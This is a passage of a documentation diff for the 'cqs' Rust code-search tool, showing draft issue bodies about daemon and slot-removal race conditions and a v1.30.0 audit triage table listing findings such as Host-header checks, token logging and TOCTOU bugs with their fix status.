+Worst case isn't corruption — it's silent re-work that defeats
+`--force`'s "I just rebuilt cleanly, you can stand down" semantics.
+
+**Current shape:** `src/cli/watch/mod.rs:1262-1283`. The `if reconcile_enabled_flag && ...` block dispatches reconcile without checking
+`db_file_identity`.
+
+**Proposed direction:**
+
+Either (a) add a `db_file_identity` check before each periodic
+reconcile call and reopen the store if it changed (matching the
+pattern at line 1105), or (b) acquire a *shared* (read) index lock
+during reconcile so it serializes against `cqs index --force`'s
+exclusive lock.
+
+Option (a) is the smaller change.
+
+**Acceptance criteria:**
+- A test that simulates `cqs index --force` rotation while
+  the watch loop is idle, then triggers periodic reconcile,
+  asserts no spurious reindexes happen post-rotation.
+- The `db_file_identity` check at line 1105 and the new check
+  use the same helper.
+- No new lock contention on the hot path (reconcile remains
+  read-only against the store).
+
+**Out of scope:**
+- Rewriting the watch loop's main scheduling.
+- Sharing locks between the watch loop and `cqs index --force`
+  beyond the DS-W5 reopen pattern.
+- Handling slot promotion races (separate concern, possibly
+  DS-V1.30.1-D1).
+```
+
+## P4-issue: DS-V1.30.1-D4 — `slot remove` does not check whether daemon is serving the slot
+**Why an issue:** Concurrency safety; needs explicit daemon-status probe before unlink and a clear `--force` opt-out path. Medium effort because it touches the slot-remove flow's user-facing error semantics.
+
+**Suggested labels:** `bug`, `tier-3`, `data-integrity`, `concurrency`
+
+**Issue body draft:**
+```
+DS-V1.30.1-D4: Refuse `slot remove` if a daemon is actively serving the slot
+
+`slot_remove` (`src/cli/commands/infra/slot.rs:322-369`) holds
+`acquire_slots_lock` across `read_active_slot → list_slots →
+remove_dir_all`, which prevents concurrent CLI invocations from
+racing each other. But the lock doesn't bind a *daemon* that's
+already serving from `slots/<name>/index.db`.
+
+Concrete failure scenario:
+1. `cqs watch --serve --slot foo` is running (holds a long-lived
+   `Store::open` against `slots/foo/index.db` + an HNSW Arc + ~500MB
+   ONNX session).
+2. Operator runs `cqs slot remove foo --force`.
+3. The CLI acquires the slots lock (the daemon doesn't hold it —
+   it isn't a slot-lifecycle operation), passes the existence
+   check, calls `fs::remove_dir_all(&dir)`.
+
+On Linux the unlink succeeds because the daemon's open file
+descriptors keep the inodes alive. But:
+
+- The daemon's WAL checkpoint on next write hits an
+  unlinked-but-open inode; checkpoints work but the rebuilt HNSW
+  persists into the (now-detached) directory tree, which is
+  reaped on daemon exit. Hours of incremental rebuild work
+  vanish silently.
+- The daemon's BatchContext serves stale snapshots forever — no
+  path notices the directory disappeared until restart.
+- `fs::remove_dir_all` on `index.db-wal` / `index.db-shm` while
+  another process is mmap'ing them is undefined per SQLite docs.
+  On WSL or any non-overlay FS that surfaces EBUSY or partial
+  removal, the user gets a half-deleted slot dir and no rollback.
+
+**Current shape:** `src/cli/commands/infra/slot.rs:322-369`. Calls
+`fs::remove_dir_all(&dir)` at line 369 without checking daemon
+status.
+
+**Proposed direction:**
+
+Before `remove_dir_all`, check `daemon_status(project_cqs_dir)`
+(the same probe `cqs hook status` uses). If a daemon is up *and*
+its active slot equals `name`, refuse with a clear error:
+
+```rust
+bail!(
+    "daemon is currently serving slot '{name}'. \
+     Stop it first: systemctl --user stop cqs-watch"
+);
+```
+
+With `--force`, downgrade to a `tracing::warn!` and proceed
+(operator opt-in). Mirrors the existing `--force` semantics for
+"this is the active slot" at line 357.
+
+**Acceptance criteria:**
+- A test using a `UnixListener` mock daemon socket that responds
+  with `slot: "foo"` causes `cqs slot remove foo` to error.
+- `cqs slot remove foo --force` against the same mock proceeds
+  with a warn.
+- The error message points operators at the systemd unit name
+  (or `cqs watch` PID) for stopping the daemon.
+- Existing slot tests pass.
+
+**Out of scope:**
+- Auto-stopping the daemon on remove (operators decide).
+- Cross-process atomic-replace of slot dirs (out of scope for
+  v1.30.x).
+- Windows-side daemon behavior (no Windows daemon today —
+  separate work).
+```

--- a/docs/audit-triage-v1.30.0.md
+++ b/docs/audit-triage-v1.30.0.md
@@ -1,276 +1,236 @@
-# Audit Triage — v1.29.0
+# v1.30.0 Post-Release Audit Triage
 
-Triage date: 2026-04-23. Source: `docs/audit-findings.md` (147 findings across 16 categories, 2 batches of 8 parallel opus auditors).
+Generated: 2026-04-26T20:42:41Z
+Total findings: 170 (8 batch 1 categories + 8 batch 2 categories)
 
-## Triage rules
+Classification: P1 (easy + high impact, fix immediately) · P2 (medium + high, batch) · P3 (easy + low, quick wins) · P4 (hard or low impact, issues or inline trivial)
 
-- **P1** — easy difficulty AND high impact (real bug or security exposure that could bite a user soon). Fix immediately.
-- **P2** — medium effort AND high impact, OR easy + solid MEDIUM impact. Fix in next batch.
-- **P3** — easy + low impact, or medium + low impact. Fix if time.
-- **P4** — hard effort OR speculative (architectural changes, "would be nice", coverage gaps with no current bug). Hard ones get filed as GitHub issues; trivial ones fixed inline.
+## Rolling Status (auto-updated as fixes land)
 
-Priority bias: lean higher for items in the new `cqs serve` surface (first external-network-reachable code we've shipped), items that break correctness on Windows (silent no-ops, chunk-id drift), and items affecting data safety in GC / TOCTOU paths. Lean lower for "nice to have" coverage, speculative scaling, and bookkeeping cleanups.
+- **P1 — 20/21 fixed + 1 deferred.** P1.17 (drain_pending_rebuild dedup) is structural — filed as #1124, slated to land alongside P2.29 (HNSW rebuild adversarial tests). Branch `audit-v1.30.0-p1-fixes` commit `cce0fbdc` covers all 20 applied.
+- **P2 — 83/92 fixed, 9 filed as issues.** All 92 P2 rows accounted for. Issues #1125 (P2.59), #1126 (P2.60), #1127 (P2.64), #1128 (P2.65), #1129 (P2.68), #1130 (P2.88), #1131 (P2.89), #1132 (P2.90), #1133 (P2.91).
+- **P3 — 49/53 fixed, 4 filed as issues #1137 (P3.26), #1138 (P3.27), #1139 (P3.30), #1140 (P3.31).** All 53 P3 rows accounted for.
+- **P4 — 0/3 fixed, 3 filed as issues #1134, #1135, #1136.**
 
-## P1 — Easy + High Impact (fix immediately)
+(Counts include only `✅ fixed` cells; `structural — file as issue` rows count as deferred.)
 
-| ID | Title | Difficulty | Location | Status |
-|---|---|---|---|---|
-| SEC-1 | `cqs serve` accepts any `Host` header — DNS-rebinding exfiltration of entire corpus | easy | `src/serve/mod.rs:97-114` | ✅ fixed |
-| SEC-2 | XSS via unescaped error body in hierarchy-3d / cluster-3d views (`body.slice()` → `innerHTML`) | easy | `src/serve/assets/views/hierarchy-3d.js:107`, `cluster-3d.js:114` | ✅ fixed |
-| SEC-3 | `build_graph` (uncapped) + `build_cluster` fetch entire chunks+function_calls tables — DoS | easy | `src/serve/data.rs:232-234,344-350,833-861` | ✅ fixed |
-| PB-V1.29-2 | Watch SPLADE encoder passes Windows `file.display()` to `get_chunks_by_origin` — silent no-op, SPLADE never updates on Windows | easy | `src/cli/watch.rs:1083-1085` | pending |
-| DS2-1 | `prune_missing` reads origin list OUTSIDE write tx — TOCTOU against concurrent upsert, wipes just-added chunks | easy | `src/store/chunks/staleness.rs:76-90` | pending |
-| DS2-2 | `prune_gitignored` reads origin list OUTSIDE write tx — same TOCTOU class | easy | `src/store/chunks/staleness.rs:333-337` | pending |
+## P1 — Fix Immediately
 
-## P2 — Medium effort OR solid-MEDIUM impact (fix in next batch)
+| # | Title | Category | Location | Status |
+|---|-------|----------|----------|--------|
+| P1.1 | PRIVACY/SECURITY claim query_log is opt-in but it's unconditional | Documentation | `PRIVACY.md:22, SECURITY.md:101` vs `src/cli/batch/commands.rs:371` | ✅ fixed |
+| P1.2 | PRIVACY claims 7-day TTL on query_cache.db; only size cap exists | Documentation | `PRIVACY.md:21` vs `src/cache.rs:1536` | ✅ fixed |
+| P1.3 | CHANGELOG names CQS_LLM_ENDPOINT — actual var is CQS_LLM_API_BASE | Documentation | `CHANGELOG.md:19` | ✅ fixed |
+| P1.4 | CONTRIBUTING tells contributors to edit dispatch.rs (registry.rs now) | Documentation | `CONTRIBUTING.md:339-355` | ✅ fixed |
+| P1.5 | ProjectRegistry doc lies about path on macOS/Windows | Platform | `src/project.rs:1-3, 176` | ✅ fixed |
+| P1.6 | gather warning hardcodes "200" — lies when CQS_GATHER_MAX_NODES set | Code Quality | `src/cli/commands/search/gather.rs:200` | ✅ fixed |
+| P1.7 | Reranker silently ignores [reranker] config section | Code Quality | `src/reranker.rs:127-154, 442` | ✅ fixed |
+| P1.8 | Embedder fingerprint falls back to repo:timestamp — cache thrash | Error Handling | `src/embedder/mod.rs:435-466` | ✅ fixed |
+| P1.9 | LocalProvider Mutex::into_inner().unwrap_or_default() loses all batch results on poison | Error Handling | `src/llm/local.rs:155, 196, 271-279, 305` | ✅ fixed |
+| P1.10 | LocalProvider unbounded HTTP body read — OOM on hostile/buggy server | Robustness | `src/llm/local.rs:97-100, 474-487` | ✅ fixed |
+| P1.11 | Auth token leaked into TraceLayer span URI logging | Security | `src/serve/mod.rs:195` + `src/serve/auth.rs:226` | ✅ fixed |
+| P1.12 | enforce_host_allowlist passes through missing Host header — DNS-rebinding bypass | Security | `src/serve/mod.rs:234-251` | ✅ fixed |
+| P1.13 | Auth token printed to stdout — captured by journald for 30-day retention | Security | `src/serve/mod.rs:111-117` | ✅ fixed |
+| P1.14 | cqs serve has no RequestBodyLimitLayer — authenticated client can OOM via large POST | Security | `src/serve/mod.rs:154-196` | ✅ fixed |
+| P1.15 | UMAP coords not invalidated on chunk content change — cluster view serves stale | Data Safety | `src/store/chunks/async_helpers.rs:339` | ✅ fixed |
+| P1.16 | --name-boost CLI accepts >1 / <0 — embedding signal sign-flips, deletes good results | Algorithm | `src/cli/args.rs:57` + `src/search/scoring/candidate.rs:286` | ✅ fixed (consumer-side clamp; CLI parser fix already shipped in v1.29.x) |
+| P1.17 | drain_pending_rebuild dedup drops fresh embeddings during rebuild window | Algorithm | `src/cli/watch.rs:1077-1105` | 📋 issue #1124 |
+| P1.18 | token_pack break-on-first-oversized — drops smaller items that would fit | Algorithm | `src/cli/commands/mod.rs:398-417` | ✅ fixed |
+| P1.19 | cqs serve shutdown handles only Ctrl-C — SIGTERM (systemctl) skips graceful drain | Platform | `src/serve/mod.rs:253-260` | ✅ fixed |
+| P1.20 | OB-V1.30-1 default subscriber drops every info_span — 150 spans invisible at default level | Observability | `src/main.rs:14-32` | ✅ fixed |
+| P1.21 | Auth failures log nothing — no journal trail for 401s | Observability | `src/serve/auth.rs:194-232` | ✅ fixed |
 
-### Security
-| ID | Title | Difficulty | Location | Status |
-|---|---|---|---|---|
-| SEC-4 | `build_graph` / `build_hierarchy` IN-list can exceed SQLite 32k bind limit → 500 | easy | `src/serve/data.rs:326-341, 670-754` | ✅ fixed |
+## P2 — Batch Fix
 
-### Platform / Correctness
-| ID | Title | Difficulty | Location | Status |
-|---|---|---|---|---|
-| PB-V1.29-1 | `cqs context` / `cqs brief` fail on Windows backslash paths (never normalized) | easy | `src/cli/commands/io/context.rs:28,115`, `brief.rs:40-42` | pending |
-| PB-V1.29-3 | `chunk.id` prefix-strip uses `abs_path.display()` — breaks on Windows verbatim + backslash paths, silent data integrity drift | medium | `src/cli/watch.rs:2432-2434` | pending |
-| PB-V1.29-5 | `dispatch_drift` / `dispatch_diff` emit Windows backslashes in JSON `file` field — breaks cross-platform agent chaining | easy | `src/cli/batch/handlers/misc.rs:277,353,365,377` | pending |
+| # | Title | Category | Location | Status |
+|---|-------|----------|----------|--------|
+| P2.1 | cmd_similar JSON emits 3 fields vs CLI's 9 — schema parity drop | Code Quality | `src/cli/batch/handlers/info.rs:139` | ✅ fixed |
+| P2.2 | dispatch_diff target_store placeholder dead in else branch | Code Quality | `src/cli/batch/handlers/misc.rs:354-387` | ✅ fixed |
+| P2.3 | Embedding/Query cache open_with_runtime ~80% copy-paste (90+ lines) | Code Quality | `src/cache.rs:103-220, 1412-1522` | ✅ fixed |
+| P2.4 | Repeated env::var parse pattern at 25+ sites — shared helpers exist but private | Code Quality | `src/limits.rs:230-260` + 25 sites | ✅ fixed (helpers promoted to pub; reranker + 2 embedder sites swapped, others left to keep tracing logs) |
+| P2.5 | EmbeddingCache accepts MAX_SIZE=0; QueryCache rejects — opposite behavior | Code Quality | `src/cache.rs:206-209, 1509-1513` | ✅ fixed |
+| P2.6 | DOC: README "544-query eval" should be 218; metrics also stale | Documentation | `README.md:5,649` | ✅ fixed |
+| P2.7 | DOC: README claims 54 languages but Cargo.toml/source disagree (Elm) | Documentation | `README.md:5,530-585` | ✅ fixed |
+| P2.8 | DOC: SECURITY omits per-project embeddings_cache.db | Documentation | `SECURITY.md:65-82` | ✅ fixed |
+| P2.9 | DOC: README/Claude integration list missing 5 commands (ping/eval/model/serve/refresh) | Documentation | `README.md:467-525` | ✅ fixed |
+| P2.10 | DOC: README cache subcommands list missing `clear` | Documentation | `README.md:521` | ✅ fixed |
+| P2.11 | --json model swap/show emits plain-text errors — no envelope | API Design | `src/cli/commands/infra/model.rs` | ✅ fixed |
+| P2.12 | cqs init/index/convert lack --json | API Design | `src/cli/commands/infra/init.rs`, etc. | ✅ fixed |
+| P2.13 | Global --slot silently ignored by `slot`/`cache` subcommands | API Design | `src/cli/definitions.rs` + slot/cache cmds | ✅ fixed (Option B: bail in cmd_slot/cmd_cache) |
+| P2.14 | cqs refresh has no --json | API Design | `src/cli/definitions.rs:755-761` | ✅ fixed |
+| P2.15 | List-shape JSON envelopes inconsistent across `*list` commands | API Design | `cmd_ref_list/cmd_model_list/cmd_project_list` | ✅ fixed (ref + model now emit `{plural: [...]}` shape; project already had it) |
+| P2.16 | cache stats mixes bytes and MB; cache compact uses bytes only | API Design | `src/cli/commands/infra/cache_cmd.rs` | ✅ fixed |
+| P2.17 | dispatch::try_daemon_query warns then silently re-runs in CLI | Error Handling | `src/cli/dispatch.rs:445-462` | ✅ fixed |
+| P2.18 | LocalProvider::fetch_batch_results returns empty map on missing batch_id | Error Handling | `src/llm/local.rs:542-547` | ✅ fixed (added `LlmError::BatchNotFound`) |
+| P2.19 | impact/format `serde_json::to_value...unwrap_or_else(json!({}))` at 6 sites | Error Handling | `src/impact/format.rs`, etc. | ✅ fixed (impact/format + context.rs sites — blame.rs out-of-scope, owned by Agent A) |
+| P2.20 | cache_stats silently treats QueryCache::open failure as 0 bytes | Error Handling | `src/cli/commands/infra/cache_cmd.rs:120-139` | ✅ fixed |
+| P2.21 | slot_remove masks list_slots failure as "only slot remaining" | Error Handling | `src/cli/commands/infra/slot.rs:303-313` | ✅ fixed |
+| P2.22 | build_token_pack swallows get_caller_counts_batch — silently degrades ranking | Error Handling | `src/cli/commands/io/context.rs:438-441` | ✅ fixed |
+| P2.23 | read --focus silently empties type_chunks on store batch failure | Error Handling | `src/cli/commands/io/read.rs:230-235` | ✅ fixed (added `warnings` field to FocusedReadResult/JsonOutput) |
+| P2.24 | serve::build_chunk_detail collapses NULL signature/content to empty string | Error Handling | `src/serve/data.rs:488-492` | ✅ fixed (signature/content_preview now `Option<String>`; JS shows `<missing — DB column NULL>` placeholder) |
+| P2.25 | Per-request span and build_* spans disconnected (spawn_blocking drops span ctx) | Observability | `src/serve/handlers.rs:86,111,131,160,210,236` | ✅ fixed (capture `Span::current()` and re-enter inside the blocking closure at all 6 handlers) |
+| P2.26 | TC-ADV: LocalProvider body-size DoS — buffers entire HTTP response | Test Coverage (adv) | `src/llm/local.rs:474-500` | ✅ fixed (regression-pin tests at `src/llm/local.rs::body_size_dos_tests`: `oversized_response_body_capped_at_max`, `fourxx_with_large_body_does_not_buffer_entire_body`) |
+| P2.27 | TC-ADV: EmbeddingCache/QueryCache accept NaN/Inf — cross-process cache poisoning | Test Coverage (adv) | `src/cache.rs:332-407, 1677-1699` | ✅ fixed |
+| P2.28 | TC-ADV: slot_create/slot_remove TOCTOU under concurrent operation | Test Coverage (adv) | `src/cli/commands/infra/slot.rs:219-350` | ✅ fixed (regression-pin test added: `slot_create_concurrent_same_name_produces_deterministic_outcome`) |
+| P2.29 | TC-ADV: Non-blocking HNSW rebuild — no panic/dim-drift/store-fail tests | Test Coverage (adv) | `src/cli/watch.rs:965-1042` | ✅ fixed (regression-pin tests: `spawn_hnsw_rebuild_dim_mismatch_returns_error_outcome`, `spawn_hnsw_rebuild_missing_index_path_returns_error_outcome`, `drain_clears_pending_when_spawned_rebuild_errors`) |
+| P2.30 | TC-ADV: serve auth strip_token_param case/percent-encoding gaps | Test Coverage (adv) | `src/serve/auth.rs:101-115` | ✅ tests pinned current behavior (capital `Token=`, `%74oken=`, `&&`, multiple `token=`, empty value, capital-T check_request rejects); prod fix follow-on |
+| P2.31 | TC-ADV: slot::migrate_legacy rollback path untested; rollback failure leaves split state | Test Coverage (adv) | `src/slot/mod.rs:511-593` | ✅ fixed (regression-pin tests: `migrate_refuses_to_proceed_when_sentinel_exists`, `migrate_clears_sentinel_on_full_success`) |
+| P2.32 | TC-ADV: LocalProvider non-HTTP api_base + concurrency mis-sizing | Test Coverage (adv) | `src/llm/local.rs:88-121` | ✅ prod fix (api_base scheme guard + worker = min(concurrency, items.len()).max(1)); test skeletons left to follow-on |
+| P2.33 | RB: Slot pointer files read with unbounded read_to_string | Robustness | `src/slot/mod.rs:207, 323` | ✅ fixed |
+| P2.34 | RB: migrate_legacy rollback leaves undetectable half-state | Robustness | `src/slot/mod.rs:511-593` | ✅ fixed |
+| P2.35 | RB: local.rs auth_attempts mutex unwrap cascades worker poison | Robustness | `src/llm/local.rs:393-396` | ✅ fixed |
+| P2.36 | RB: redirect policy disagrees between production (none) and doctor (limited(2)) | Robustness | `src/llm/local.rs:99` vs `src/cli/commands/infra/doctor.rs:578` | ✅ fixed (LocalProvider now uses `limited(2)` to match doctor) |
+| P2.37 | SHL: CAGRA itopk_size < k on small indexes — silent zero-result regression | Scaling | `src/cagra.rs:359` | ✅ fixed (force itopk_size ≥ k; warn-and-empty when k > itopk_max so caller falls back to HNSW) |
+| P2.38 | SHL: nl::generate_nl char_budget defaults to 512 even with 2048 max_seq_len | Scaling | `src/nl/mod.rs:222-229` | ✅ fixed (added `generate_nl_with_template_and_seq_len` + `_with_seq_len` accessor; legacy entry points keep env-only behavior) |
+| P2.39 | SHL: MAX_BATCH_SIZE=10_000 silently truncates summary/HyDE on large corpora | Scaling | `src/llm/mod.rs:192` | ✅ fixed (`crate::limits::llm_max_batch_size` reads CQS_LLM_MAX_BATCH_SIZE; truncation now surfaces on stderr) |
+| P2.40 | SHL: serve graph/cluster cap 50_000 hardcoded; chunk_detail LIMIT 50/50/20 | Scaling | `src/serve/data.rs:17,24,505,542,571` | ✅ fixed (env-tunable via `CQS_SERVE_GRAPH_MAX_NODES/EDGES`, `CQS_SERVE_CLUSTER_MAX_NODES`, `CQS_SERVE_CHUNK_DETAIL_{CALLERS,CALLEES,TESTS}` in `crate::limits`; clamped to hard ceilings) |
+| P2.41 | SHL: embed_batch_size default 64 doesn't scale with model dim/seq | Scaling | `src/cli/pipeline/types.rs:143` | ✅ fixed (added `embed_batch_size_for(model)`; pipeline migration follow-on) |
+| P2.42 | SHL: CagraIndex::gpu_available has no VRAM ceiling — OOMs on 8GB GPUs | Scaling | `src/cagra.rs:262-264` | ✅ fixed (`gpu_available_for(n,dim)` with 2 GiB conservative cap + `CQS_CAGRA_MAX_GPU_BYTES`; legacy `gpu_available` shims through) |
+| P2.43 | semantic_diff sort lacks tie-breaker — non-deterministic JSON across runs | Algorithm | `src/diff.rs:202-207` | ✅ fixed (already cascading; pinned by existing `test_diff_sort_tie_break_deterministic`) |
+| P2.44 | is_structural_query keyword probe misses keywords at end-of-query | Algorithm | `src/search/router.rs:787-789` | ✅ fixed (regression-pin tests added: `test_p2_44_*`) |
+| P2.45 | bfs_expand processes seeds in HashMap order — non-deterministic name_scores at cap | Algorithm | `src/gather.rs:317-320` | ✅ fixed (regression-pin test added: `test_p2_45_bfs_seed_order_is_deterministic`) |
+| P2.46 | llm summary contrastive_neighbors top-K sort lacks tie-breaker | Algorithm | `src/llm/summary.rs:263-267` | ✅ fixed (regression-pin test added: `p2_46_contrastive_neighbors_top_k_deterministic_under_ties`) |
+| P2.47 | reranker compute_scores unchecked batch_size*stride; negative shape[1] panic | Algorithm | `src/reranker.rs:368-387` | ✅ fixed (already guarded via AC-V1.29-6; verified) |
+| P2.48 | doc_comments select_uncached sort lacks chunk-id tertiary key | Algorithm | `src/llm/doc_comments.rs:222-242` | ✅ fixed (already cascading on `a.id.cmp(&b.id)`; verified) |
+| P2.49 | map_hunks_to_functions returns hunks in HashMap order — non-deterministic impact-diff | Algorithm | `src/impact/diff.rs:38-168` | ✅ fixed (BTreeMap by_file + post-loop sort on (file, line_start, name)) |
+| P2.50 | search_reference threshold/weight ordering bug — under-samples corpus when weight<1 | Algorithm | `src/reference.rs:231-285` | ✅ fixed (relax raw_threshold = threshold/weight + 2× over-fetch + post-weight retain/sort/truncate) |
+| P2.51 | find_type_overlap chunk_info uses HashMap iteration — non-deterministic file attribution | Algorithm | `src/related.rs:131-157` | ✅ fixed (sorted result keys + min(file,line) representative + (count desc, name asc) tie-break + sorted type_names) |
+| P2.52 | CAGRA search_with_filter under-fills when included<k — caller can't distinguish | Algorithm | `src/cagra.rs:520-598` | ✅ fixed (cap effective_k = k.min(included)) |
+| P2.53 | Hybrid SPLADE alpha=0 emits 1.0+s scores; cliff at SPLADE boundary | Algorithm | `src/search/query.rs:649-672` | ✅ fixed (boost = s * 0.1; dense cosine remains dominant signal) |
+| P2.54 | apply_scoring_pipeline sign-flips on out-of-range name_boost; clamp embedding pre-blend | Algorithm | `src/search/scoring/candidate.rs:283-298` | ✅ fixed (clamp `embedding_score` into [0,1] before blend; name_boost clamp already present) |
+| P2.55 | open_browser uses explorer.exe on Windows — drops query string/token | Platform | `src/cli/commands/serve.rs:89-104` | ✅ fixed |
+| P2.56 | NTFS/FAT32 mtime equality check — watch loop skips second save on FAT32 USB | Platform | `src/cli/watch.rs:551-560` | ✅ fixed (actual equality at watch.rs:2475 — strict `<` on WSL drvfs paths) |
+| P2.57 | enforce_host_allowlist accepts missing Host header (dev ergonomic) | Platform | `src/serve/mod.rs:230-251` | ✅ fixed (covered by P1.12 — now rejects missing Host) |
+| P2.58 | --bind 0.0.0.0 host-allowlist breaks LAN — pushes operators to --no-auth | Security | `src/serve/mod.rs:207-218` | ✅ fixed (wildcard bind returns empty allowlist + startup warn; middleware short-circuits to "accept any Host"; per-launch token remains primary defence — avoids new `if_addrs` dep) |
+| P2.59 | Migration restore_from_backup overwrites live DB while pool open | Data Safety | `src/store/backup.rs:171-180` | 📋 issue #1125 |
+| P2.60 | stream_summary_writer bypasses WRITE_LOCK — concurrent writer collides with reindex | Data Safety | `src/store/chunks/crud.rs:504-545` | 📋 issue #1126 |
+| P2.61 | slot_remove TOCTOU on concurrent promote — active_slot points to deleted dir | Data Safety | `src/cli/commands/infra/slot.rs:299-350` | ✅ fixed |
+| P2.62 | Slot legacy migration moves live WAL/SHM instead of checkpointing first | Data Safety | `src/slot/mod.rs:511-624` | ✅ fixed |
+| P2.63 | model_fingerprint fallback uses Unix timestamp — every restart misses cache | Data Safety | `src/embedder/mod.rs:435-465` | ✅ fixed |
+| P2.64 | Daemon serializes ALL queries through one Mutex<BatchContext> | Data Safety | `src/cli/watch.rs:1775-1858` | 📋 issue #1127 |
+| P2.65 | embedding_cache schema doesn't separate `embedding` vs `embedding_base` purpose | Data Safety | `src/cache.rs:159-171` | 📋 issue #1128 |
+| P2.66 | cache evict() vs write_batch race — evict deletes rows just inserted | Data Safety | `src/cache.rs:354-460` | ✅ fixed |
+| P2.67 | PF: reindex_files watch path double-parses calls per chunk | Performance | `src/cli/watch.rs:2815, 2930-2939` | ✅ fixed |
+| P2.68 | PF: reindex_files watch path bypasses global EmbeddingCache | Performance | `src/cli/watch.rs:2876-2887` | 📋 issue #1129 |
+| P2.69 | PF: wrap_value deep-clones entire payload via serde round trip | Performance | `src/cli/json_envelope.rs:160-176` | ✅ fixed |
+| P2.70 | PF: build_graph correlated subquery for n_callers — N rows × COUNT(*) | Performance | `src/serve/data.rs:234-264` | ✅ fixed (replaced per-row correlated subquery with `LEFT JOIN (SELECT callee_name, COUNT(*) ... GROUP BY)` — O(M+N) instead of O(N log M)) |
+| P2.71 | RM: Background HNSW rebuild thread detached — daemon shutdown can't wait | Resource Mgmt | `src/cli/watch.rs:965-1042` | ✅ fixed |
+| P2.72 | RM: pending_rebuild.delta grows unbounded during long rebuild | Resource Mgmt | `src/cli/watch.rs:611, 2667-2741` | ✅ fixed |
+| P2.73 | RM: LocalProvider::stash retains all submitted batch results until drop | Resource Mgmt | `src/llm/local.rs:74, 304-309, 542-547` | ✅ fixed (cap MAX_STASH_BATCHES=128; evict-oldest on insert) |
+| P2.74 | RM: Daemon never checks fs.inotify.max_user_watches — silently drops events | Resource Mgmt | `src/cli/watch.rs:1947-1949` | ✅ fixed |
+| P2.75 | RM: select_provider triggers CUDA probe + symlink for every CLI process | Resource Mgmt | `src/embedder/provider.rs:171-248` | ✅ fixed (Embedder.provider is now `OnceLock<ExecutionProvider>` resolved on first inference; `new_cpu` pre-populates) |
+| P2.76 | RM: serve handlers spawn_blocking unbounded — 512 thread × 10MB working set | Resource Mgmt | `src/serve/handlers.rs:86-89` + `mod.rs:92` | ✅ fixed (semaphore in `AppState.blocking_permits`, default 32, env-tunable via `CQS_SERVE_BLOCKING_PERMITS`; permit acquired before spawn_blocking and held by closure) |
+| P2.77 | RM: Embedder clear_session doubled-memory window invisible | Resource Mgmt | `src/embedder/mod.rs:261, 808-823` | ✅ fixed (logs `strong_count` when in-flight inference is mid-encode at clear time) |
+| P2.78 | TC-HAP: cqs serve data endpoints never tested with populated data | Test Coverage | `src/serve/data.rs` + `src/serve/tests.rs` | ✅ fixed (populated_fixture tests at serve/tests.rs:1007–1146) |
+| P2.79 | TC-HAP: 16 batch dispatch handlers have zero tests | Test Coverage | `src/cli/batch/handlers/{misc,graph,info}.rs` | ✅ fixed (8 new tests across graph/info/misc handlers + the pre-existing 7-test `dispatch_tests` mod cover the high-traffic surface: `dispatch_callers/callees/related/impact_diff` in `graph::tests`, `dispatch_stats` in `info::tests`, `dispatch_ping/help/refresh` in `misc::tests`) |
+| P2.80 | TC-HAP: Reranker::rerank/rerank_with_passages have no tests | Test Coverage | `src/reranker.rs:160, 190` | ✅ fixed (`test_rerank_empty_input_returns_empty` no-op shortcut + `#[ignore]`-gated `test_rerank_reorders_by_relevance` for the model-loading happy path) |
+| P2.81 | TC-HAP: cmd_project Search has no CLI integration test | Test Coverage | `src/cli/commands/infra/project.rs:70` | ✅ fixed (`tests/cli_project_search_test.rs` — XDG-isolated two-project search with assert_cmd, gated behind `slow-tests`) |
+| P2.82 | TC-HAP: cqs ref add/list/remove/update no end-to-end CLI test | Test Coverage | `src/cli/commands/infra/reference.rs` | ✅ fixed (`tests/cli_ref_test.rs` — round-trip add/list/remove/update coverage) |
+| P2.83 | TC-HAP: handle_socket_client no happy-path round-trip test | Test Coverage | `src/cli/watch.rs:160` | ✅ fixed (UnixStream-pair round-trip in `watch::adversarial_socket_tests` — seeds chunk, sends `stats` request, asserts `status:ok` envelope with numeric `total_chunks`) |
+| P2.84 | TC-HAP: spawn_hnsw_rebuild/drain_pending_rebuild ship with zero tests | Test Coverage | `src/cli/watch.rs spawn_hnsw_rebuild` | ✅ fixed (covered by P2.29 spawn_hnsw_rebuild tests + existing `drain_pending_rebuild_*` tests in watch::tests) |
+| P2.85 | TC-HAP: for_each_command! macro + 4 emitters have no behavioral tests | Test Coverage | `src/cli/registry.rs:61` | ✅ fixed (`variant_name_pins_critical_command_labels` + 3× `batch_support_*` tests in `definitions::tests` exercise the macro-emitted `variant_name()` and `batch_support()` impls) |
+| P2.86 | TC-HAP: build_hnsw_index_owned/build_hnsw_base_index — no direct tests | Test Coverage | `src/cli/commands/index/build.rs:848,880` | ✅ fixed (4 direct happy-path + empty-store tests added in `build::tests`) |
+| P2.87 | TC-HAP: hyde_query_pass and doc_comment_pass have zero tests | Test Coverage | `src/llm/hyde.rs:11`, `src/llm/doc_comments.rs:135` | ✅ fixed (`hyde_query_pass_returns_zero_for_empty_store`, `doc_comment_pass_returns_empty_for_empty_store` — local-provider config, empty-store short-circuit) |
+| P2.88 | EX: Adding third score signal touches two parallel fusion paths | Extensibility | `src/store/search.rs:182-229`, `src/search/query.rs:511-720` | 📋 issue #1130 |
+| P2.89 | EX: Vector index backend selection is hand-coded if/else; no IndexBackend trait | Extensibility | `src/cli/store.rs:423-540` | 📋 issue #1131 |
+| P2.90 | EX: ScoringOverrides knob → 4 sites; no shared resolver | Extensibility | `src/config.rs:153-172` + scoring | 📋 issue #1132 |
+| P2.91 | EX: NoteEntry has no kind/tag taxonomy — only sentiment | Extensibility | `src/note.rs:41-89` | 📋 issue #1133 |
+| P2.92 | RM: Embedder::new opens fresh QueryCache + 7-day prune on every CLI command | Resource Mgmt | `src/embedder/mod.rs:355-366` | ✅ fixed |
 
-### Data Safety
-| ID | Title | Difficulty | Location | Status |
-|---|---|---|---|---|
-| DS2-3 | `set_metadata_opt` / `touch_updated_at` bypass `WRITE_LOCK` — SQLITE_BUSY under concurrent reindex + batch-id setters | easy | `src/store/metadata.rs:409-418, 452-475` | pending |
-| DS2-4 | Phantom-chunks DELETE in separate tx from upsert — mid-batch crash serves queries against half-pruned index | medium | `src/cli/watch.rs:2568-2579` | pending |
-| DS2-8 | `CQS_MIGRATE_REQUIRE_BACKUP` defaults to off — destructive v18→v19 migration with no backup on failure | medium | `src/store/migrations.rs:478-562` | pending |
+## P3 — Quick Wins
 
-### Algorithm Correctness
-| ID | Title | Difficulty | Location | Status |
-|---|---|---|---|---|
-| AC-V1.29-1 | `semantic_diff` sort has no tie-break — non-determinism in `cqs diff`/`cqs drift` output | easy | `src/diff.rs:202-207, 298-303` | pending |
